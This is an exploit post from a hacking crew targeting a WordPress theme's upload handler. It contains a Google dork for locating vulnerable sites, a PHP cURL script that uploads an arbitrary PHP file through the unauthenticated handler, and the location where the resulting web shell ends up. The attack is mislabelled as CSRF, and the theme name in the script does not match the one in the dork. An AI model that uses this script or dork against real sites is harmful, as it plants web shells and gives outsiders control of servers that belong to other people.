Assalamuallaikum Wr.Wb
- #SidoarjoGetar | Stay calm and Hide our Skills
- #Author: aAn | Posted by PriaPolos Extreme Crew
- #Dork: inurl:"/themes/madidus-themes/"
- #Type: CSRF & Xampp ,Uploadify
- #Tested:-
- #CMS:WordPress
Vulnerable & Exploits: /wp-content/themes/madidus-themes/functions/upload-handler.php
CSRF :
<?php
$uploadfile="Ical.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Location : /wp-content/uploads/[Years]/[Month]/IcalSadega.php
Credits : PriaPolos | Extreme Crew
